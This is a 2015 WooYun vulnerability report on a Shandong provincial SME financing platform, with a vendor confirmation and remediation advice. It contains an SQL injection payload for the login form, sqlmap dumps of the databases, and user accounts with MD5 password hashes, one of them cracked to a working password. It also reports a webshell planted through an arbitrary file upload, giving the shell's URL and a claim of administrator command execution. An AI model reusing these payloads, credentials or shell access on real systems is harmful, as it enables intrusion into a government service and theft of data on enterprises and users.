当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115746

漏洞标题:山东省某企业融资平台多个漏洞已shell

相关厂商:cncert国家互联网应急中心

漏洞作者: JulyTornado

提交时间:2015-05-25 13:40

修复时间:2015-07-14 01:10

公开时间:2015-07-14 01:10

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-30: 厂商已经确认,细节仅向厂商公开
2015-06-09: 细节向核心白帽子及相关领域专家公开
2015-06-19: 细节向普通白帽子公开
2015-06-29: 细节向实习白帽子公开
2015-07-14: 细节向公众公开

简要描述:

0x01: 多处SQL注入
0x02: 多个管理员弱口令
0x03: 任意文件上传,且为管理员权限

详细说明:

http://rzpt.smesd.gov.cn/

首页.png


0x01: 多处SQL注入
http://rzpt.smesd.gov.cn/artical.jsp?id=a8977ca767154e2db2458af5f3b89c91

sqlmap结果.png


available databases [35]:                                                      
[*] APEX_030200
[*] CTXSYS
[*] CYJQ
[*] DAREWIN
[*] DBSNMP
[*] ERONGE_DBA
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] HR
[*] IX
[*] LINQU
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SD_T
[*] SDSJZX_DBA
[*] SH
[*] SIB_SAAS
[*] SJZX_DBA
[*] SXXD
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
[*] XXFW
Database: ERONGE_DBA                                                          
[17 tables]
+-----------------------+
| AGENCY                |
| ATTACHFILES           |
| CORPBASEINFOS         |
| CORPBASEINFOS_TEMP    |
| FILTER                |
| GROUPS                |
| INFOCATAS             |
| INFOS                 |
| LOANESTIMATE          |
| LOANPRODUCT           |
| LOANPRODUCTBAK        |
| LOANPRODUCT_2012_12_4 |
| ORDERS                |
| PRODUCTTYPE           |
| PROJECT               |
| PROJECT_TMP           |
| USERS                 |
+-----------------------+
select USERNAME,LOGINNAME,PASSWORD from USERS [16]:                            
[*] 信用金桥, xinyongjinqiao, 86d92a2b506a5b8e3c87f94accbd83cf
[*] 网站维护, weihu, 14e1b600b1fd579f47433b88e8d85291
[*] 高唐, gaotang, 14e1b600b1fd579f47433b88e8d85291
[*] 临沂, linyi, 14e1b600b1fd579f47433b88e8d85291
[*] 日照, rizhao, 14e1b600b1fd579f47433b88e8d85291
[*] 运营管理员, yunying, 14e1b600b1fd579f47433b88e8d85291
[*] 管理员, admin2014, 550e1bafe077ff0b0b67f4e32f29d751
[*] office, office1, 14e1b600b1fd579f47433b88e8d85291
[*] 滨州市中小企业局, binzhou, 14e1b600b1fd579f47433b88e8d85291
[*] 茌平县中小企业局, chiping, 14e1b600b1fd579f47433b88e8d85291
[*] 济南市中小企业局, jinan1, 14e1b600b1fd579f47433b88e8d85291
[*] 聊城市中小企业局, liaocheng, 14e1b600b1fd579f47433b88e8d85291
[*] 莘县, shenxian, 14e1b600b1fd579f47433b88e8d85291
[*] 莘县中小企业局, shenxian1, 14e1b600b1fd579f47433b88e8d85291
[*] 济南, jinan, 14e1b600b1fd579f47433b88e8d85291
[*] 禹城金融办, ycjrb, 14e1b600b1fd579f47433b88e8d85291


登陆框loginName参数存在盲注:

POST /login?action=login HTTP/1.1
……
loginName=dfsdfdsf%27+or+%271%27%3D%272&moduleid=4028803c263bfb0d01263bfb85070002&password=dsfsdfd&imageField.x=67&imageField.y=16


登陆框注入1.png


登陆框注入2.png


2044家企业,1052个项目:

存在大量数据.png


0x02: 多个管理员弱口令
14e1b600b1fd579f47433b88e8d85291
口算得到123456
使用 weihu/123456登陆:

登陆成功.png


0x03: 任意文件上传,且为管理员权限
logo上传处可上传任意文件:

上传界面.png


改包上传:

上传改包.png


得到菜刀url:
http://rzpt.smesd.gov.cn/agencyimg/8ad337822be2492b012be2dc817b0328.jsp

菜刀可运行.png


文件浏览.png


可执行命令,且为管理员权限,可进一步渗透内网:

命令执行.png


数据库连接信息:

数据库连接信息.png

漏洞证明:

同上

修复方案:

0x01: 在服务器端过滤危险字符或使用预编译语句
0x02: 修改弱口令,并制定前置口令策略
0x03: 在服务器端使用扩展名白名单,并关闭上传目录服务器脚本执行权限,请勿将中间件以管理员身份运行

版权声明:转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-30 01:08

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无